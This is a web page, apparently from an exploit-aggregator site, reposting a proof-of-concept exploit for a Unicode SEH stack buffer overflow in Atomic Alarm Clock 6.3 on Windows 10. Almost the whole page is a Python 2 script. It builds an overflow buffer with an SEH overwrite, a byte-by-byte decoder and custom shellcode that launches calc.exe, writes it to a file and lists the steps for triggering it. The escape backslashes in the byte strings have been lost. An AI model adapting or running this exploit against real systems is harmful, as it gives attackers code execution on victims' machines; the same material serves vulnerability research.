Atomic Alarm Clock 6.3 – Stack Overflow (Unicode+SEH) – Digitalmunition




Exploit/Advisories 1586856090_spider-orange.png

Published on April 29th, 2020 📆 | 7558 Views ⚑

0

Atomic Alarm Clock 6.3 – Stack Overflow (Unicode+SEH)

# Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-17
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer

File    = 'poc.txt'

os_nSEH = 'x41'*(461)
nSEH    = 'xebx05'   # jmp short +2
SEH     = 'x47x47'   # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe] 
#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False 

getPC   = 'x73'   # add [ebx], dh   # nop | [EBX] = writable memory 
getPC  += 'x61'   # popad           # [ESP] = &Payload
getPC  += 'x72'   # add [edx], dh   # realigns execution for 1 byte opcodes

ebx2eax  = 'x58'  # pop eax         # EAX = &Payload
ebx2eax += 'x72'  # add [edx], dh

# Ajust EAX to &Decoder
getDecoder  = 'x05x13x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += 'x72'         # add [edx], dh
getDecoder += 'x2Dx11x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += 'x72'         # add [edx], dh
getDecoder += 'x50'         # push eax            # [ESP] = &Decoder
getDecoder += 'x72'         # add [edx], dh

#DecoderHex  = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' 
firstHalf   = 'x50x47xD2xC9xB9x04xDBx42xDBx1Cx20x30x47x74xEBx50' 
## 2nd byte - x00 => x5F
venBlinds   = 'x40x72xC6x5Fx72x40x72x40x72'         
## 4th byte - x00 => x33
venBlinds  += 'xC6x33x72x40x72x40x72'         
## 6th byte - x00 => x33
venBlinds  += 'xC6x33x72x40x72x40x72'         
## 8th byte - x00 => x66
venBlinds  += 'xC6x66x72x40x72x40x72'         
## 10th byte - x00 => x10
venBlinds  += 'xC6x10x72x40x72x40x72'         
## 12th byte - x00 => x33
venBlinds  += 'xC6x33x72x40x72x40x72'         
## 14th byte - x00 => x42
venBlinds  += 'xC6x42x72x40x72x40x72'         
## 16th byte - x00 => x32
venBlinds  += 'xC6x32x72x40x72x40x72'         
## 18th byte - x00 => x02
venBlinds  += 'xC6x02x72x40x72x40x72'         
## 20th byte - x00 => x10
venBlinds  += 'xC6x10x72x40x72x40x72'         
## 22nd byte - x00 => x3F
venBlinds  += 'xC6x3Fx72x40x72x40x72'         
## 24nd byte - x00 => x1F
venBlinds  += 'xC6x1Fx72x40x72x40x72'         
## 26th byte - x00 => x49
venBlinds  += 'xC6x49x72x40x72x40x72'         
## 28th byte - x00 => x02
venBlinds  += 'xC6x02x72x40x72x40x72'         
## 30th byte - x00 => xED
venBlinds  += 'xC6xEDx72x40x72x40x72'         
## 32nd byte - x00 => xC3
venBlinds  += 'xC6xC3x72x40x72'         
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds  += 'xC3'         #   ret  [!] Now we are executing the decoder!

os_decoder   = 'x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))

# Custom PopCalc shellcode that avoids the bad characters
fKernel32  = 'x33xF6xF7xE6x64x03x52x30x03x42x0Cx03x70x1CxADx50x5ExADxFFx70x08'

gExpotTbl  = 'x33xC9x33xF6x33xDBxF7xE3x58x50x03x70x3Cx03xF0x03x56x78x03xD0x03x5Ax20x03xD8x03x4Ax24x03xC8x51x33xFFx03x7Ax1Cx03xF8x57'

fWinExec   = 'x68x57x69x6Ex45x33xC0x33xF6x03xF4xFCx50x33xC9x41x41x41x41xF7xE1x33xFFx03x3Cx18x58x03x7Cx24x0CxF3xA6x74x03x40xEBxE1x33xC9x41x41xF7xE1x33xC9x03x4Cx24x08x03xC8x33xC0x66x03x01x33xC9x41x41x41x41xF7xE1xFFx74x24x04x01x04x24x5Ax33xDBx03x1Ax03x5Cx24x0C'

# Call WinExec( CmdLine, ShowState );
#   CmdLine   = "calc.exe"
#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec  = 'x33xC9x51x68x2Ex65x78x65x68x63x61x6Cx63x33xC0x03xC4x41x51x50xFFxD3'

shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec

buffer      = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler      = 'x77'*(9000-len(buffer))
buffer      = buffer+filler

try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'
            

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...